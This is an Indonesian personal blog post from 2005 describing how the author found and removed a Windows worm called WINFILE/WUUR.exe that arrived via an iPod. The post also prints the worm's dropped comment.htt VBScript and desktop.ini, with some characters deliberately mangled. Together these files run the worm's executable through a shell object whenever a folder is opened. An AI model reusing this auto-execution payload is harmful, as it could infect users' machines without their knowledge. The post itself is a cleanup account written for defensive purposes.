Monday, October 17, 2005

WINFILE ?

Dah lama gak main main winblows, eh pas pake winblows buat cobain tuk bahan bicara di BINUS besok terpaksa pake winblows yang dah lama gak dipake (dual ma ubuntu di junk server) , kebetulan aku pake SP2 .. hehehe

nah, kebetulan sekalian ngopiin file "ngaji" ke IPOD via iTunes supaya bisa di dengerin , eh tiba tiba di ipod ada file WINFILE (maklum abis dipake ma adek n baru balik tadi , n ternyata nyisain sedikit oleh oleh :p ) , hehehe, iseng iseng tak eksekusi eh kok gak bereaksi , karena mencurigakan maka tak DELETE aja hehehehe, SHIFT + DEL (biar gak masuk recycle) , yups aman.. eh... wuih filenya tiba tiba muncul lagi :) (ajaib :P) , wuih ... karena males ngeberesinnya , aku pikir nanti deh di ubuntu tak hapus :P (pengen tau secanggih apa sih nih virus kalo gak nemu registry di OS, di linux mana ada registry ..lol.. :P)

Ya udah , install APPSERV (untuk latihan simulasi via webhacking) , tapi tiba tiba pas browse direktori C:\ , eh WINFILE dah muncul disitu dan nongkrong dengan pongahnya (sialan!!) , ya udah deh aku langsung pencet Ctrl+Alt+DEl (walau bego bego gini aku tau dimana biasanya program ini bercokol) , eh ada image name Wuur (yah walau dah lama gak pake windows tapi alhamdulillah masih inget mana service dengan image name aseli dan fake :P , dan juga dulu kebetulan pernah belajar "virus-virus-an" dikit ..heheh...) langsung aja aku kill/matiin (ternyata gak terlalu canggih nih virus) , abis itu tak search semua file WINFILE , n aku delete aja, yup 1 lagi harus cari tau pemicunya (pembangkitnya), biasanya sih di autoexec, startup, or cara termudah ketik di run -- > msconfig (hum, bisa masup, ternyata virusnya cuma buat iseng nih, gak ada canggih canggihnya, gantian /me songong dikit ... :p ), masuk bagian stratup eh nemuin lagi Startup Item WUUR yang mengeksekusi command ke "C:\WINDOWS\TEMP\WUUR.exe", ya udah tinggal drivethrough ke dir WINDOWS\TEMP dan aku delete langsung deh "WUUR.exe", langsung rebes degh (ternyata gw gak goblog goblog banget yah :P ).... sayang gak sempet Reverse engineering file wuurnya abis gw gak mau lama lama di winblows :p

btw dia juga buat dua file lain yang pertama "comment.htt" yang merupakan VBS berisikan
<#ody><#tml>
<#ody >
<#cript language=vbscript>
document.write "
"

<#cript language=vbscript>
On Error Resume Next
Dim we,path,win
we = ""
Path = ""
win=""
Path = Left(document.location, Len(document.location) - 11)
Path = Mid(Path, 9)
Set Ap#leObject = document.ap#lets("lhw")
Ap#leObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
Ap#leObject.createInstance()
Set Ws#hell = Ap#leObject.GetObject()
Ws#hell.run(Path + "WINFILE.EXE")
<#script>
<#body>
<#html>
<#body>

dan desktop.ini
[.Sh#llCl#ssInfo]
HTMLInfoTipFile=file://C#mment.htt
Conf#rmFileOp = 0

2 file di kacaukan biar kalo buka blog gw gak di blok antivirus :p , sekalian delete aja kedua file itu :)

btw , gw gak pake ANtivirus tuh :P !!!!!!

1 comment:

  1. thanks bos atas informasinya, kompi gua kena nih...

    ReplyDelete